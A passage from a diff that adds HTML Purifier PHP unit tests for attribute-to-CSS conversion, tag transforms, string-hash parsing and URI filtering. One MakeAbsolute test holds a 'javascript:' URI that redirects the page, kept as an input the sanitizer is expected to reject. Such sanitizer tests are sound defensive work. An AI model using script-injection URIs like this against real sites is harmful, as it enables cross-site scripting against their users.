height="10" /><th width="10" height="5%" /><hr width="10" height="10" />', + '<td style="width:5%;height:10px;" /><th style="width:10px;height:5%;" /><hr style="width:10px;" />' + ); + } + + function testTdConvertNowrap() { + $this->assertResult( + '<td nowrap />', + '<td style="white-space:nowrap;" />' + ); + } + + function testCaptionConvertAlignLeft() { + $this->assertResult( + '<caption align="left" />', + '<caption style="text-align:left;" />' + ); + } + + function testCaptionConvertAlignRight() { + $this->assertResult( + '<caption align="right" />', + '<caption style="text-align:right;" />' + ); + } + + function testCaptionConvertAlignTop() { + $this->assertResult( + '<caption align="top" />', + '<caption style="caption-side:top;" />' + ); + } + + function testCaptionConvertAlignBottom() { + $this->assertResult( + '<caption align="bottom" />', + '<caption style="caption-side:bottom;" />' + ); + } + + function testCaptionRemoveInvalidAlign() { + $this->assertResult( + '<caption align="nonsense" />', + '<caption />' + ); + } + + function testTableConvertAlignLeft() { + $this->assertResult( + '<table align="left" />', + '<table style="float:left;" />' + ); + } + + function testTableConvertAlignCenter() { + $this->assertResult( + '<table align="center" />', + '<table style="margin-left:auto;margin-right:auto;" />' + ); + } + + function testTableConvertAlignRight() { + $this->assertResult( + '<table align="right" />', + '<table style="float:right;" />' + ); + } + + function testTableRemoveInvalidAlign() { + $this->assertResult( + '<table align="top" />', + '<table />' + ); + } + + function testImgConvertAlignLeft() { + $this->assertResult( + '<img src="foobar.jpg" alt="foobar" align="left" />', + '<img src="foobar.jpg" alt="foobar" style="float:left;" />' + ); + } + + function testImgConvertAlignRight() { + $this->assertResult( + '<img src="foobar.jpg" alt="foobar" align="right" />', + '<img src="foobar.jpg" alt="foobar" style="float:right;" />' + ); + } + + function testImgConvertAlignBottom() { + $this->assertResult( + '<img src="foobar.jpg" alt="foobar" align="bottom" />', + '<img src="foobar.jpg" alt="foobar" style="vertical-align:baseline;" />' + ); + } + + function testImgConvertAlignMiddle() { + $this->assertResult( + '<img src="foobar.jpg" alt="foobar" align="middle" />', + '<img src="foobar.jpg" alt="foobar" style="vertical-align:middle;" />' + ); + } + + function testImgConvertAlignTop() { + $this->assertResult( + '<img src="foobar.jpg" alt="foobar" align="top" />', + '<img src="foobar.jpg" alt="foobar" style="vertical-align:top;" />' + ); + } + + function testImgRemoveInvalidAlign() { + $this->assertResult( + '<img src="foobar.jpg" alt="foobar" align="outerspace" />', + '<img src="foobar.jpg" alt="foobar" />' + ); + } + + function testBorderConvertHVSpace() { + $this->assertResult( + '<img src="foo" alt="foo" hspace="1" vspace="3" />', + '<img src="foo" alt="foo" style="margin-top:3px;margin-bottom:3px;margin-left:1px;margin-right:1px;" />' + ); + } + + function testHrConvertSize() { + $this->assertResult( + '<hr size="3" />', + '<hr style="height:3px;" />' + ); + } + + function testHrConvertNoshade() { + $this->assertResult( + '<hr noshade />', + '<hr style="color:#808080;background-color:#808080;border:0;" />' + ); + } + + function testHrConvertAlignLeft() { + $this->assertResult( + '<hr align="left" />', + '<hr style="margin-left:0;margin-right:auto;text-align:left;" />' + ); + } + + function testHrConvertAlignCenter() { + $this->assertResult( + '<hr align="center" />', + '<hr style="margin-left:auto;margin-right:auto;text-align:center;" />' + ); + } + + function testHrConvertAlignRight() { + $this->assertResult( + '<hr align="right" />', + '<hr style="margin-left:auto;margin-right:0;text-align:right;" />' + ); + } + + function testHrRemoveInvalidAlign() { + $this->assertResult( + '<hr align="bottom" />', + '<hr />' + ); + } + + function testBrConvertClearLeft() { + $this->assertResult( + '<br clear="left" />', + '<br style="clear:left;" />' + ); + } + + function testBrConvertClearRight() { + $this->assertResult( + '<br clear="right" />', + '<br style="clear:right;" />' + ); + } + + function testBrConvertClearAll() { + $this->assertResult( + '<br clear="all" />', + '<br style="clear:both;" />' + ); + } + + function testBrConvertClearNone() { + $this->assertResult( + '<br clear="none" />', + '<br style="clear:none;" />' + ); + } + + function testBrRemoveInvalidClear() { + $this->assertResult( + '<br clear="foo" />', + '<br />' + ); + } + + function testUlConvertTypeDisc() { + $this->assertResult( + '<ul type="disc" />', + '<ul style="list-style-type:disc;" />' + ); + } + + function testUlConvertTypeSquare() { + $this->assertResult( + '<ul type="square" />', + '<ul style="list-style-type:square;" />' + ); + } + + function testUlConvertTypeCircle() { + $this->assertResult( + '<ul type="circle" />', + '<ul style="list-style-type:circle;" />' + ); + } + + function testUlConvertTypeCaseInsensitive() { + $this->assertResult( + '<ul type="CIRCLE" />', + '<ul style="list-style-type:circle;" />' + ); + } + + function testUlRemoveInvalidType() { + $this->assertResult( + '<ul type="a" />', + '<ul />' + ); + } + + function testOlConvertType1() { + $this->assertResult( + '<ol type="1" />', + '<ol style="list-style-type:decimal;" />' + ); + } + + function testOlConvertTypeLowerI() { + $this->assertResult( + '<ol type="i" />', + '<ol style="list-style-type:lower-roman;" />' + ); + } + + function testOlConvertTypeUpperI() { + $this->assertResult( + '<ol type="I" />', + '<ol style="list-style-type:upper-roman;" />' + ); + } + + function testOlConvertTypeLowerA() { + $this->assertResult( + '<ol type="a" />', + '<ol style="list-style-type:lower-alpha;" />' + ); + } + + function testOlConvertTypeUpperA() { + $this->assertResult( + '<ol type="A" />', + '<ol style="list-style-type:upper-alpha;" />' + ); + } + + function testOlRemoveInvalidType() { + $this->assertResult( + '<ol type="disc" />', + '<ol />' + ); + } + + function testLiConvertTypeCircle() { + $this->assertResult( + '<li type="circle" />', + '<li style="list-style-type:circle;" />' + ); + } + + function testLiConvertTypeA() { + $this->assertResult( + '<li type="A" />', + '<li style="list-style-type:upper-alpha;" />' + ); + } + + function testLiConvertTypeCaseSensitive() { + $this->assertResult( + '<li type="CIRCLE" />', + '<li />' + ); + } + + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/StrategyHarness.php b/lib/htmlpurifier/tests/HTMLPurifier/StrategyHarness.php new file mode 100644 index 000000000..15f22f6bd --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/StrategyHarness.php @@ -0,0 +1,15 @@ +<?php + +class HTMLPurifier_StrategyHarness extends HTMLPurifier_ComplexHarness +{ + + function setUp() { + parent::setUp(); + $this->func = 'execute'; + $this->to_tokens = true; + $this->to_html = true; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/StringHashParser/AppendMultiline.txt b/lib/htmlpurifier/tests/HTMLPurifier/StringHashParser/AppendMultiline.txt new file mode 100644 index 000000000..dfc12da3b --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/StringHashParser/AppendMultiline.txt @@ -0,0 +1,5 @@ +--KEY-- +Line1 +--KEY-- +Line2 +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/StringHashParser/Default.txt b/lib/htmlpurifier/tests/HTMLPurifier/StringHashParser/Default.txt new file mode 100644 index 000000000..9d2aea80d --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/StringHashParser/Default.txt @@ -0,0 +1,2 @@ +DefaultValue +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/StringHashParser/Multi.txt b/lib/htmlpurifier/tests/HTMLPurifier/StringHashParser/Multi.txt new file mode 100644 index 000000000..caea55b1e --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/StringHashParser/Multi.txt @@ -0,0 +1,19 @@ +Namespace.Directive +TYPE: string +CHAIN-ME: 2 +--DESCRIPTION-- +Multiline +stuff +--FOR-WHO-- +Single multiline +---- + +Namespace.Directive2 +TYPE: integer +CHAIN-ME: 3 +--DESCRIPTION-- +M +stuff +--FOR-WHO-- +Single multiline2 +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/StringHashParser/OverrideSingle.txt b/lib/htmlpurifier/tests/HTMLPurifier/StringHashParser/OverrideSingle.txt new file mode 100644 index 000000000..1d27c7148 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/StringHashParser/OverrideSingle.txt @@ -0,0 +1,3 @@ +KEY: Original +KEY: New +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/StringHashParser/Simple.txt b/lib/htmlpurifier/tests/HTMLPurifier/StringHashParser/Simple.txt new file mode 100644 index 000000000..e8042d9ed --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/StringHashParser/Simple.txt @@ -0,0 +1,10 @@ +Namespace.Directive +TYPE: string +CHAIN-ME: 2 +--DESCRIPTION-- +Multiline +stuff +--EMPTY-- +--FOR-WHO-- +Single multiline +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/StringHashParserTest.php b/lib/htmlpurifier/tests/HTMLPurifier/StringHashParserTest.php new file mode 100644 index 000000000..6d357f86c --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/StringHashParserTest.php @@ -0,0 +1,89 @@ +<?php + +/** + * @note Sample input files are located in the StringHashParser/ directory. + */ +class HTMLPurifier_StringHashParserTest extends UnitTestCase +{ + + /** + * Instance of ConfigSchema_StringHashParser being tested. + */ + protected $parser; + + public function setup() { + $this->parser = new HTMLPurifier_StringHashParser(); + } + + /** + * Assert that $file gets parsed into the form of $expect + */ + protected function assertParse($file, $expect) { + $result = $this->parser->parseFile(dirname(__FILE__) . '/StringHashParser/' . $file); + $this->assertIdentical($result, $expect); + } + + function testSimple() { + $this->assertParse('Simple.txt', array( + 'ID' => 'Namespace.Directive', + 'TYPE' => 'string', + 'CHAIN-ME' => '2', + 'DESCRIPTION' => "Multiline\nstuff\n", + 'EMPTY' => '', + 'FOR-WHO' => "Single multiline\n", + )); + } + + function testOverrideSingle() { + $this->assertParse('OverrideSingle.txt', array( + 'KEY' => 'New', + )); + } + + function testAppendMultiline() { + $this->assertParse('AppendMultiline.txt', array( + 'KEY' => "Line1\nLine2\n", + )); + } + + function testDefault() { + $this->parser->default = 'NEW-ID'; + $this->assertParse('Default.txt', array( + 'NEW-ID' => 'DefaultValue', + )); + } + + function testError() { + try { + $this->parser->parseFile('NoExist.txt'); + } catch (HTMLPurifier_ConfigSchema_Exception $e) { + $this->assertIdentical($e->getMessage(), 'File NoExist.txt does not exist'); + } + } + + function testParseMultiple() { + $result = $this->parser->parseMultiFile(dirname(__FILE__) . '/StringHashParser/Multi.txt'); + $this->assertIdentical( + $result, + array( + array( + 'ID' => 'Namespace.Directive', + 'TYPE' => 'string', + 'CHAIN-ME' => '2', + 'DESCRIPTION' => "Multiline\nstuff\n", + 'FOR-WHO' => "Single multiline\n", + ), + array( + 'ID' => 'Namespace.Directive2', + 'TYPE' => 'integer', + 'CHAIN-ME' => '3', + 'DESCRIPTION' => "M\nstuff\n", + 'FOR-WHO' => "Single multiline2\n", + ) + ) + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/StringHashTest.php b/lib/htmlpurifier/tests/HTMLPurifier/StringHashTest.php new file mode 100644 index 000000000..653e5bf70 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/StringHashTest.php @@ -0,0 +1,20 @@ +<?php + +class HTMLPurifier_StringHashTest extends UnitTestCase +{ + + function testUsed() { + $hash = new HTMLPurifier_StringHash(array( + 'key' => 'value', + 'key2' => 'value2' + )); + $this->assertIdentical($hash->getAccessed(), array()); + $t = $hash->offsetGet('key'); + $this->assertIdentical($hash->getAccessed(), array('key' => true)); + $hash->resetAccessed(); + $this->assertIdentical($hash->getAccessed(), array()); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/TagTransformTest.php b/lib/htmlpurifier/tests/HTMLPurifier/TagTransformTest.php new file mode 100644 index 000000000..8669d5b91 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/TagTransformTest.php @@ -0,0 +1,179 @@ +<?php + +// needs to be seperated into files +class HTMLPurifier_TagTransformTest extends HTMLPurifier_Harness +{ + + /** + * Asserts that a transformation happens + * + * This assertion performs several tests on the transform: + * + * -# Transforms a start tag with only $name and no attributes + * -# Transforms a start tag with $name and $attributes + * -# Transform an end tag + * -# Transform an empty tag with only $name and no attributes + * -# Transform an empty tag with $name and $attributes + * + * In its current form, it assumes that start and empty tags would be + * treated the same, and is really ensuring that the tag transform doesn't + * do anything wonky to the tag type. + * + * @param $transformer HTMLPurifier_TagTransform class to test + * @param $name Name of the original tag + * @param $attributes Attributes of the original tag + * @param $expect_name Name of output tag + * @param $expect_attributes Attributes of output tag when $attributes + * is included. + * @param $expect_added_attributes Attributes of output tag when $attributes + * are omitted. + * @param $config_array Configuration array for HTMLPurifier_Config + * @param $context_array Context array for HTMLPurifier_Context + */ + protected function assertTransformation($transformer, + $name, $attributes, + $expect_name, $expect_attributes, + $expect_added_attributes = array(), + $config_array = array(), $context_array = array()) { + + $config = HTMLPurifier_Config::createDefault(); + $config->loadArray($config_array); + + $context = new HTMLPurifier_Context(); + $context->loadArray($context_array); + + // start tag transform + $this->assertIdentical( + new HTMLPurifier_Token_Start($expect_name, $expect_added_attributes), + $transformer->transform( + new HTMLPurifier_Token_Start($name), $config, $context) + ); + + // start tag transform with attributes + $this->assertIdentical( + new HTMLPurifier_Token_Start($expect_name, $expect_attributes), + $transformer->transform( + new HTMLPurifier_Token_Start($name, $attributes), + $config, $context + ) + ); + + // end tag transform + $this->assertIdentical( + new HTMLPurifier_Token_End($expect_name), + $transformer->transform( + new HTMLPurifier_Token_End($name), $config, $context + ) + ); + + // empty tag transform + $this->assertIdentical( + new HTMLPurifier_Token_Empty($expect_name, $expect_added_attributes), + $transformer->transform( + new HTMLPurifier_Token_Empty($name), $config, $context + ) + ); + + // empty tag transform with attributes + $this->assertIdentical( + new HTMLPurifier_Token_Empty($expect_name, $expect_attributes), + $transformer->transform( + new HTMLPurifier_Token_Empty($name, $attributes), + $config, $context + ) + ); + + + } + + function testSimple() { + + $transformer = new HTMLPurifier_TagTransform_Simple('ul'); + + $this->assertTransformation( + $transformer, + 'menu', array('class' => 'boom'), + 'ul', array('class' => 'boom') + ); + + } + + function testSimpleWithCSS() { + + $transformer = new HTMLPurifier_TagTransform_Simple('div', 'text-align:center;'); + + $this->assertTransformation( + $transformer, + 'center', array('class' => 'boom', 'style'=>'font-weight:bold;'), + 'div', array('class' => 'boom', 'style'=>'text-align:center;font-weight:bold;'), + array('style'=>'text-align:center;') + ); + + // test special case, uppercase attribute key + $this->assertTransformation( + $transformer, + 'center', array('STYLE'=>'font-weight:bold;'), + 'div', array('style'=>'text-align:center;font-weight:bold;'), + array('style'=>'text-align:center;') + ); + + } + + protected function assertSizeToStyle($transformer, $size, $style) { + $this->assertTransformation( + $transformer, + 'font', array('size' => $size), + 'span', array('style' => 'font-size:' . $style . ';') + ); + } + + function testFont() { + + $transformer = new HTMLPurifier_TagTransform_Font(); + + // test a font-face transformation + $this->assertTransformation( + $transformer, + 'font', array('face' => 'Arial'), + 'span', array('style' => 'font-family:Arial;') + ); + + // test a color transformation + $this->assertTransformation( + $transformer, + 'font', array('color' => 'red'), + 'span', array('style' => 'color:red;') + ); + + // test the size transforms + $this->assertSizeToStyle($transformer, '0', 'xx-small'); + $this->assertSizeToStyle($transformer, '1', 'xx-small'); + $this->assertSizeToStyle($transformer, '2', 'small'); + $this->assertSizeToStyle($transformer, '3', 'medium'); + $this->assertSizeToStyle($transformer, '4', 'large'); + $this->assertSizeToStyle($transformer, '5', 'x-large'); + $this->assertSizeToStyle($transformer, '6', 'xx-large'); + $this->assertSizeToStyle($transformer, '7', '300%'); + $this->assertSizeToStyle($transformer, '-1', 'smaller'); + $this->assertSizeToStyle($transformer, '-2', '60%'); + $this->assertSizeToStyle($transformer, '-3', '60%'); + $this->assertSizeToStyle($transformer, '+1', 'larger'); + $this->assertSizeToStyle($transformer, '+2', '150%'); + $this->assertSizeToStyle($transformer, '+3', '200%'); + $this->assertSizeToStyle($transformer, '+4', '300%'); + $this->assertSizeToStyle($transformer, '+5', '300%'); + $this->assertTransformation( + $transformer, 'font', array('size' => ''), + 'span', array() + ); + + // test multiple transforms, the alphabetical ordering is important + $this->assertTransformation( + $transformer, + 'font', array('color' => 'red', 'face' => 'Arial', 'size' => '6'), + 'span', array('style' => 'color:red;font-family:Arial;font-size:xx-large;') + ); + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/TokenFactoryTest.php b/lib/htmlpurifier/tests/HTMLPurifier/TokenFactoryTest.php new file mode 100644 index 000000000..3eb731f83 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/TokenFactoryTest.php @@ -0,0 +1,17 @@ +<?php + +class HTMLPurifier_TokenFactoryTest extends HTMLPurifier_Harness +{ + public function test() { + + $factory = new HTMLPurifier_TokenFactory(); + + $regular = new HTMLPurifier_Token_Start('a', array('href' => 'about:blank')); + $generated = $factory->createStart('a', array('href' => 'about:blank')); + + $this->assertIdentical($regular, $generated); + + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/TokenTest.php b/lib/htmlpurifier/tests/HTMLPurifier/TokenTest.php new file mode 100644 index 000000000..099b98603 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/TokenTest.php @@ -0,0 +1,34 @@ +<?php + +class HTMLPurifier_TokenTest extends HTMLPurifier_Harness +{ + + protected function assertTokenConstruction($name, $attr, + $expect_name = null, $expect_attr = null + ) { + if ($expect_name === null) $expect_name = $name; + if ($expect_attr === null) $expect_attr = $attr; + $token = new HTMLPurifier_Token_Start($name, $attr); + + $this->assertIdentical($expect_name, $token->name); + $this->assertIdentical($expect_attr, $token->attr); + } + + function testConstruct() { + + // standard case + $this->assertTokenConstruction('a', array('href' => 'about:blank')); + + // lowercase the tag's name + $this->assertTokenConstruction('A', array('href' => 'about:blank'), + 'a'); + + // lowercase attributes + $this->assertTokenConstruction('a', array('HREF' => 'about:blank'), + 'a', array('href' => 'about:blank')); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/URIDefinitionTest.php b/lib/htmlpurifier/tests/HTMLPurifier/URIDefinitionTest.php new file mode 100644 index 000000000..6ab0c2a6b --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/URIDefinitionTest.php @@ -0,0 +1,62 @@ +<?php + +class HTMLPurifier_URIDefinitionTest extends HTMLPurifier_URIHarness +{ + + protected function createFilterMock($expect = true, $result = true, $post = false, $setup = true) { + static $i = 0; + generate_mock_once('HTMLPurifier_URIFilter'); + $mock = new HTMLPurifier_URIFilterMock(); + if ($expect) $mock->expectOnce('filter'); + else $mock->expectNever('filter'); + $mock->setReturnValue('filter', $result); + $mock->setReturnValue('prepare', $setup); + $mock->name = $i++; + $mock->post = $post; + return $mock; + } + + function test_filter() { + $def = new HTMLPurifier_URIDefinition(); + $def->addFilter($this->createFilterMock(), $this->config); + $def->addFilter($this->createFilterMock(), $this->config); + $uri = $this->createURI('test'); + $this->assertTrue($def->filter($uri, $this->config, $this->context)); + } + + function test_filter_earlyAbortIfFail() { + $def = new HTMLPurifier_URIDefinition(); + $def->addFilter($this->createFilterMock(true, false), $this->config); + $def->addFilter($this->createFilterMock(false), $this->config); // never called + $uri = $this->createURI('test'); + $this->assertFalse($def->filter($uri, $this->config, $this->context)); + } + + function test_setupMemberVariables_collisionPrecedenceIsHostBaseScheme() { + $this->config->set('URI.Host', $host = 'example.com'); + $this->config->set('URI.Base', $base = 'http://sub.example.com/foo/bar.html'); + $this->config->set('URI.DefaultScheme', 'ftp'); + $def = new HTMLPurifier_URIDefinition(); + $def->setup($this->config); + $this->assertIdentical($def->host, $host); + $this->assertIdentical($def->base, $this->createURI($base)); + $this->assertIdentical($def->defaultScheme, 'http'); // not ftp! + } + + function test_setupMemberVariables_onlyScheme() { + $this->config->set('URI.DefaultScheme', 'ftp'); + $def = new HTMLPurifier_URIDefinition(); + $def->setup($this->config); + $this->assertIdentical($def->defaultScheme, 'ftp'); + } + + function test_setupMemberVariables_onlyBase() { + $this->config->set('URI.Base', 'http://sub.example.com/foo/bar.html'); + $def = new HTMLPurifier_URIDefinition(); + $def->setup($this->config); + $this->assertIdentical($def->host, 'sub.example.com'); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/URIFilter/DisableExternalResourcesTest.php b/lib/htmlpurifier/tests/HTMLPurifier/URIFilter/DisableExternalResourcesTest.php new file mode 100644 index 000000000..21c70c145 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/URIFilter/DisableExternalResourcesTest.php @@ -0,0 +1,23 @@ +<?php + +class HTMLPurifier_URIFilter_DisableExternalResourcesTest extends + HTMLPurifier_URIFilter_DisableExternalTest +{ + + function setUp() { + parent::setUp(); + $this->filter = new HTMLPurifier_URIFilter_DisableExternalResources(); + $var = true; + $this->context->register('EmbeddedURI', $var); + } + + function testPreserveWhenNotEmbedded() { + $this->context->destroy('EmbeddedURI'); // undo setUp + $this->assertFiltering( + 'http://example.com' + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/URIFilter/DisableExternalTest.php b/lib/htmlpurifier/tests/HTMLPurifier/URIFilter/DisableExternalTest.php new file mode 100644 index 000000000..3176246a1 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/URIFilter/DisableExternalTest.php @@ -0,0 +1,53 @@ +<?php + +class HTMLPurifier_URIFilter_DisableExternalTest extends HTMLPurifier_URIFilterHarness +{ + + function setUp() { + parent::setUp(); + $this->filter = new HTMLPurifier_URIFilter_DisableExternal(); + } + + function testRemoveExternal() { + $this->assertFiltering( + 'http://example.com', false + ); + } + + function testPreserveInternal() { + $this->assertFiltering( + '/foo/bar' + ); + } + + function testPreserveOurHost() { + $this->config->set('URI.Host', 'example.com'); + $this->assertFiltering( + 'http://example.com' + ); + } + + function testPreserveOurSubdomain() { + $this->config->set('URI.Host', 'example.com'); + $this->assertFiltering( + 'http://www.example.com' + ); + } + + function testRemoveSuperdomain() { + $this->config->set('URI.Host', 'www.example.com'); + $this->assertFiltering( + 'http://example.com', false + ); + } + + function testBaseAsHost() { + $this->config->set('URI.Base', 'http://www.example.com/foo/bar'); + $this->assertFiltering( + 'http://www.example.com/baz' + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/URIFilter/DisableResourcesTest.php b/lib/htmlpurifier/tests/HTMLPurifier/URIFilter/DisableResourcesTest.php new file mode 100644 index 000000000..c2cea8fe6 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/URIFilter/DisableResourcesTest.php @@ -0,0 +1,24 @@ +<?php + +class HTMLPurifier_URIFilter_DisableResourcesTest extends HTMLPurifier_URIFilterHarness +{ + + function setUp() { + parent::setUp(); + $this->filter = new HTMLPurifier_URIFilter_DisableResources(); + $var = true; + $this->context->register('EmbeddedURI', $var); + } + + function testRemoveResource() { + $this->assertFiltering('/foo/bar', false); + } + + function testPreserveRegular() { + $this->context->destroy('EmbeddedURI'); // undo setUp + $this->assertFiltering('/foo/bar'); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/URIFilter/HostBlacklistTest.php b/lib/htmlpurifier/tests/HTMLPurifier/URIFilter/HostBlacklistTest.php new file mode 100644 index 000000000..4af5a6009 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/URIFilter/HostBlacklistTest.php @@ -0,0 +1,29 @@ +<?php + +class HTMLPurifier_URIFilter_HostBlacklistTest extends HTMLPurifier_URIFilterHarness +{ + + function setUp() { + parent::setUp(); + $this->filter = new HTMLPurifier_URIFilter_HostBlacklist(); + } + + function testRejectBlacklistedHost() { + $this->config->set('URI.HostBlacklist', 'example.com'); + $this->assertFiltering('http://example.com', false); + } + + function testRejectBlacklistedHostThoughNotTrue() { + // maybe this behavior should change + $this->config->set('URI.HostBlacklist', 'example.com'); + $this->assertFiltering('http://example.comcast.com', false); + } + + function testPreserveNonBlacklistedHost() { + $this->config->set('URI.HostBlacklist', 'example.com'); + $this->assertFiltering('http://google.com'); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/URIFilter/MakeAbsoluteTest.php b/lib/htmlpurifier/tests/HTMLPurifier/URIFilter/MakeAbsoluteTest.php new file mode 100644 index 000000000..9002f1ff8 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/URIFilter/MakeAbsoluteTest.php @@ -0,0 +1,146 @@ +<?php + +class HTMLPurifier_URIFilter_MakeAbsoluteTest extends HTMLPurifier_URIFilterHarness +{ + + function setUp() { + parent::setUp(); + $this->filter = new HTMLPurifier_URIFilter_MakeAbsolute(); + $this->setBase(); + } + + function setBase($base = 'http://example.com/foo/bar.html?q=s#frag') { + $this->config->set('URI.Base', $base); + } + + // corresponding to RFC 2396 + + function testPreserveAbsolute() { + $this->assertFiltering('http://example.com/foo.html'); + } + + function testFilterBlank() { + $this->assertFiltering('', 'http://example.com/foo/bar.html?q=s'); + } + + function testFilterEmptyPath() { + $this->assertFiltering('?q=s#frag', 'http://example.com/foo/bar.html?q=s#frag'); + } + + function testPreserveAltScheme() { + $this->assertFiltering('mailto:bob@example.com'); + } + + function testFilterIgnoreHTTPSpecialCase() { + $this->assertFiltering('http:/', 'http://example.com/'); + } + + function testFilterAbsolutePath() { + $this->assertFiltering('/foo.txt', 'http://example.com/foo.txt'); + } + + function testFilterRelativePath() { + $this->assertFiltering('baz.txt', 'http://example.com/foo/baz.txt'); + } + + function testFilterRelativePathWithInternalDot() { + $this->assertFiltering('./baz.txt', 'http://example.com/foo/baz.txt'); + } + + function testFilterRelativePathWithEndingDot() { + $this->assertFiltering('baz/.', 'http://example.com/foo/baz/'); + } + + function testFilterRelativePathDot() { + $this->assertFiltering('.', 'http://example.com/foo/'); + } + + function testFilterRelativePathMultiDot() { + $this->assertFiltering('././foo/./bar/.././baz', 'http://example.com/foo/foo/baz'); + } + + function testFilterAbsolutePathWithDot() { + $this->assertFiltering('/./foo', 'http://example.com/foo'); + } + + function testFilterAbsolutePathWithMultiDot() { + $this->assertFiltering('/./foo/../bar/.', 'http://example.com/bar/'); + } + + function testFilterRelativePathWithInternalDotDot() { + $this->assertFiltering('../baz.txt', 'http://example.com/baz.txt'); + } + + function testFilterRelativePathWithEndingDotDot() { + $this->assertFiltering('..', 'http://example.com/'); + } + + function testFilterRelativePathTooManyDotDots() { + $this->assertFiltering('../../', 'http://example.com/'); + } + + function testFilterAppendingQueryAndFragment() { + $this->assertFiltering('/foo.php?q=s#frag', 'http://example.com/foo.php?q=s#frag'); + } + + // edge cases below + + function testFilterAbsolutePathBase() { + $this->setBase('/foo/baz.txt'); + $this->assertFiltering('test.php', '/foo/test.php'); + } + + function testFilterAbsolutePathBaseDirectory() { + $this->setBase('/foo/'); + $this->assertFiltering('test.php', '/foo/test.php'); + } + + function testFilterAbsolutePathBaseBelow() { + $this->setBase('/foo/baz.txt'); + $this->assertFiltering('../../test.php', '/test.php'); + } + + function testFilterRelativePathBase() { + $this->setBase('foo/baz.html'); + $this->assertFiltering('foo.php', 'foo/foo.php'); + } + + function testFilterRelativePathBaseBelow() { + $this->setBase('../baz.html'); + $this->assertFiltering('test/strike.html', '../test/strike.html'); + } + + function testFilterRelativePathBaseWithAbsoluteURI() { + $this->setBase('../baz.html'); + $this->assertFiltering('/test/strike.html'); + } + + function testFilterRelativePathBaseWithDot() { + $this->setBase('../baz.html'); + $this->assertFiltering('.', '../'); + } + + function testRemoveJavaScriptWithEmbeddedLink() { + // credits: NykO18 + $this->setBase('http://www.example.com/'); + $this->assertFiltering('javascript: window.location = \'http://www.example.com\';', false); + } + + // miscellaneous + + function testFilterDomainWithNoSlash() { + $this->setBase('http://example.com'); + $this->assertFiltering('foo', 'http://example.com/foo'); + } + + // error case + + function testErrorNoBase() { + $this->setBase(null); + $this->expectError('URI.MakeAbsolute is being ignored due to lack of value for URI.Base configuration'); + $this->assertFiltering('foo/bar.txt'); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/URIFilter/MungeTest.php b/lib/htmlpurifier/tests/HTMLPurifier/URIFilter/MungeTest.php new file mode 100644 index 000000000..1acf11ea7 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/URIFilter/MungeTest.php @@ -0,0 +1,145 @@ +<?php + +class HTMLPurifier_URIFilter_MungeTest extends HTMLPurifier_URIFilterHarness +{ + + function setUp() { + parent::setUp(); + $this->filter = new HTMLPurifier_URIFilter_Munge(); + } + + protected function setMunge($uri = 'http://www.google.com/url?q=%s') { + $this->config->set('URI.Munge', $uri); + } + + protected function setSecureMunge($key = 'secret') { + $this->setMunge('/redirect.php?url=%s&checksum=%t'); + $this->config->set('URI.MungeSecretKey', $key); + } + + function testMunge() { + $this->setMunge(); + $this->assertFiltering( + 'http://www.example.com/', + 'http://www.google.com/url?q=http%3A%2F%2Fwww.example.com%2F' + ); + } + + function testMungeReplaceTagName() { + $this->setMunge('/r?tagname=%n&url=%s'); + $token = new HTMLPurifier_Token_Start('a'); + $this->context->register('CurrentToken', $token); + $this->assertFiltering('http://google.com', '/r?tagname=a&url=http%3A%2F%2Fgoogle.com'); + } + + function testMungeReplaceAttribute() { + $this->setMunge('/r?attr=%m&url=%s'); + $attr = 'href'; + $this->context->register('CurrentAttr', $attr); + $this->assertFiltering('http://google.com', '/r?attr=href&url=http%3A%2F%2Fgoogle.com'); + } + + function testMungeReplaceResource() { + $this->setMunge('/r?embeds=%r&url=%s'); + $embeds = false; + $this->context->register('EmbeddedURI', $embeds); + $this->assertFiltering('http://google.com', 